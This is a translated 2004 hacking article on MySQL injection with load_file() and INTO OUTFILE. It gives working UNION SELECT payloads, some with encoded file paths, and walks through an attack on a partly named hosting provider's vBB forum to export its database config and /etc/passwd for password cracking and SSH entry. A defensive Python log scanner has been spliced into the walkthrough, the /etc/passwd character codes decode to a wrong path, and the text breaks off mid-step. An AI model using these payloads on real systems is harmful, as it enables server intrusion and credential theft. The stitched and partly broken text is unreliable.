Advanced SQL Injection with MySQL

Author: angel
Article nature: original
Original release date: 2004-07-14
Text: Security Angel · angel [BST]

Preface

My "SQL Injection with MySQL" (in the July special topic of "Hacker Line of Defense") gives a fairly comprehensive introduction to MySQL injection, but there is one very harmful function that I did not mention in that text, because if this function is applied flexibly, the security of PHP and even of the server itself will be greatly reduced. Since "SQL Injection with MySQL" was published during the summer vacation, and considering the many newcomers, students and morally corrupt people, I did not write this up in that article; in fact this article was already written in early May. After that topic many people turned to researching PHP+MySQL injection, many new techniques will be dug up, and the advanced skills we have mastered will be made public once they are no longer useful. The relatively basic material is not repeated in this article.

Details

In SQL statements you can use a variety of MySQL built-in functions. The commonly used ones are database(), user(), system_user(), session_user() and current_user(), which return some system information. There is one more function that is even more useful: load_file(), which reads a file and returns its contents as a string. Seeing this, you should already be thinking about what it allows: reading some confidential files. But it comes with restrictions:
- the file must be specified by its full path on the server;
- the MySQL user must have permission to read the file (the FILE privilege);
- the file must be smaller than max_allowed_packet;
- if the file does not exist, or cannot be read for any of the reasons above, the function returns NULL.

The most difficult one is permission. Under Windows, if NTFS permissions are set properly, the relevant files cannot be read: when you meet a file that only Administrators can access, an ordinary user gets nowhere. In an actual injection there are two difficulties to solve:
1. Obtaining the absolute physical path.
2. Constructing an effective malformed statement.

In many PHP programs, when a wrong query is submitted and display_errors = On, the program exposes the absolute path of the web directory. Once that path is known, an injectable PHP program seriously threatens the security of the entire server. Constructing the statement is the smaller problem. Suppose the SQL statement of a program is as follows:
    SELECT * FROM article WHERE articleid=$id

Note: current conditions: magic_quotes_gpc = Off, and C:/boot.ini is readable. We construct $id as:

    -1 union select 1,1,1,1,load_file('c:/boot.ini')

Our query becomes:

    SELECT * FROM article WHERE articleid=-1 union select 1,1,1,1,load_file('c:/boot.ini')

and the program displays the contents of C:/boot.ini. But hosts with magic_quotes_gpc = Off are getting rarer, so how do we construct a statement without quotation marks? Friends who have read "SQL Injection with MySQL" will know: use the char() function, or convert the string to hexadecimal. That is exactly it.

Note: current conditions: magic_quotes_gpc = On, and C:/boot.ini is readable. We construct $id as:

    -1 union select 1,1,1,load_file(char(99,58,47,98,111,111,116,46,105,110,105))

"char(99,58,47,98,111,111,116,46,105,110,105)" is the ASCII code of "c:/boot.ini". Our query becomes:

    SELECT * FROM article WHERE articleid=-1 union select 1,1,1,load_file(char(99,58,47,98,111,111,116,46,105,110,105))

and we can still read boot.ini successfully. Converting the string to hexadecimal also works: "c:/boot.ini" is "0x633A2F626F6F742E696E69", so the statement above can also be written as:

    SELECT * FROM article WHERE articleid=-1 union select 1,1,1,load_file(0x633A2F626F6F742E696E69)

This is shorter and easier on the eyes. You can enter the following query in phpMyAdmin or at the mysql> prompt and study it at leisure:

    SELECT LOAD_FILE('[string]')

Of course, in practical applications the contents of the file may not be displayed, for various reasons; in that case we can also export the file with INTO OUTFILE. Everyone already knows how to use it, so I will not go into detail; an example explains everything.

Example

www.***host.cn is a well-known FreeBSD hosting provider. We test it because it uses the vBB forum, which has the calendar.php vulnerability, so I do not need to search the site for a vulnerability everywhere (although there are vulnerabilities everywhere). This is a complete security test: I only obtained information and did not enter the server.
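As an added defensive example (my own code, not from the article or from vBB), here is a small Python checker a log reviewer can run over request lines: it URL-decodes the query string, rewrites the char() and hexadecimal encodings shown above back into plain quoted strings, and reports UNION SELECT, load_file() together with the file path it names, and INTO OUTFILE together with the export path. The request lines are constructed samples modelled on the article's payloads, and the /home/example path is a placeholder.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample request lines (not from any real server log); the payload
# shapes mirror the encodings discussed in the article.
SAMPLE_REQUESTS = [
    "/article.php?id=5",
    "/article.php?id=-1%20union%20select%201,1,1,1,load_file('c:/boot.ini')",
    "/article.php?id=-1+union+select+1,1,1,load_file(char(99,58,47,98,111,111,116,46,105,110,105))",
    "/article.php?id=-1+union+select+1,1,1,load_file(0x633A2F626F6F742E696E69)",
    "/calendar.php?action=edit&eventid=-1+union+select+1,1,1,1,1,load_file(char(47,101,116,99))"
    "+from+user+into+outfile+'/home/example/soft/cfg.txt'",
]

CHAR_RE = re.compile(r"\bchar\s*\(\s*([\d\s,]+)\)", re.I)
HEX_RE = re.compile(r"\b0x([0-9a-f]{2,})\b", re.I)
# A capturing group, where present, is the file path the statement names.
INDICATORS = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "load_file": re.compile(r"\bload_file\s*\(\s*'([^']*)'", re.I),
    "into_outfile": re.compile(r"\binto\s+(?:out|dump)file\s*'([^']*)'", re.I),
}

def decode_obfuscation(sql):
    """Rewrite CHAR(n,n,...) and 0x.. literals as the quoted strings they
    encode, so an encoded path reads like the plain-quoted form."""
    def char_to_str(m):
        return "'" + "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()) + "'"

    def hex_to_str(m):
        try:  # odd-length runs are not a valid literal and are left untouched
            return "'" + bytes.fromhex(m.group(1)).decode("latin-1") + "'"
        except ValueError:
            return m.group(0)

    return HEX_RE.sub(hex_to_str, CHAR_RE.sub(char_to_str, sql))

def analyze_request(raw):
    """Return {indicator: path-or-True} for one raw request line; {} if clean."""
    decoded = decode_obfuscation(unquote_plus(raw))
    hits = {}
    for name, rx in INDICATORS.items():
        m = rx.search(decoded)
        if m:
            hits[name] = m.group(1) if rx.groups else True
    return hits

def scan(requests):
    """Return the (request, hits) pairs that carry at least one indicator."""
    return [(r, h) for r in requests if (h := analyze_request(r))]
```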
Here I need to explain one piece of code in vBB's global.php, as follows:

    // get rid of slashes in get / post / cookie data
    function stripslashesarray(&$arr) {
        while (list($key, $val) = each($arr)) {
            if ($key != "templatesused" and $key != "argc" and $key != "argv") {
                if (is_string($val)) {
                    $arr["$key"] = stripslashes($val);
                } else if (is_array($val) and ($key == 'HTTP_POST_VARS' or $key == 'HTTP_GET_VARS' or strtoupper($key) != $key)) {
                    $arr["$key"] = stripslashesarray($val);
                }
            }
        }
        return $arr;
    }

    if (get_magic_quotes_gpc() and is_array($GLOBALS)) {
        if (isset($attachment)) {
            $GLOBALS['attachment'] = addslashes($GLOBALS['attachment']);
        }
        if ($avatarfile) {
            $GLOBALS['avatarfile'] = addslashes($GLOBALS['avatarfile']);
        }
        $GLOBALS = stripslashesarray($GLOBALS);
    }
    set_magic_quotes_runtime(0);

What this code does is: if magic_quotes_gpc is on, it removes the escaping backslash in front of every special character. So whatever the state of magic_quotes_gpc in php.ini, the single quotes we enter are unaffected, and you can inject. Ha ha.

We know that submitting

    /calendar.php?action=edit&eventid=1 union select 1,1,1,1,userid=1

retrieves the username and the MD5 hash of the password, but for special reasons it is not displayed. With my experience, though, I know that nothing has been configured against this, so we can read files and export them. Because I had earlier, by chance, accessed a file on the site containing phpinfo(), I knew the absolute path of the web directory. From browsing the site I found a download system that works by generating HTML files; if that directory had no write permission, the HTML files could not be generated. But all this is not the focus of this article. We now have the following information:
Web absolute path: /home/4ngel
Writable directory path: /home/4ngel/soft/
magic_quotes_gpc = On

Compared with root on the host, the forum is nothing; I am not interested in the forum admin. What we want is to read the forum's configuration file and /etc/passwd. Knowing the MySQL connection information, you can start from there to write a webshell or other things; knowing /etc/passwd, we can crack the passwords and go in directly over SSH.

The vBB forum configuration file is /home/4ngel/forum/admin/config.php. Convert it to ASCII codes and submit:

    calendar.php?action=edit&eventid=1 union select 1,1,1,1,1,load_file(char(47,104,111,109,101,47,52,110,103,101,108,47,102,111,114,117,109,47,97,100,109,105,110,47,99,111,110,102,105,103,46,112,104,112)) from user where userid=1 into outfile '/home/4ngel/soft/cfg.txt'

Oh, and remember to add a WHERE condition, otherwise if the forum has many users the exported file will be quite large. Or simply specify $eventid as a value that does not exist, then no WHERE is needed, like this:

    calendar.php?action=edit&eventid=-1 union select 1,1,1,1,1,load_file(char(47,104,111,109,101,47,52,110,103,101,108,47,102,111,114,117,109,47,97,100,109,105,110,47,99,111,110,102,105,103,46,112,104,112)) from user into outfile '/home/4ngel/soft/cfg.txt'

Convert /etc/passwd to ASCII codes and submit:

    calendar.php?action=edit&eventid=-1 union select 1,1,1,1,1,load_file(char(47,101,115,115,47,112,97,115,115,119,100)) from user into outfile '/home/4ngel/soft/etcpwd.txt'

Watch the top of the forum page; the following error message appears:

    Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/4ngel/forum/admin/db_mysql.php on line 154

Experience tells us that the file export succeeded. Submit: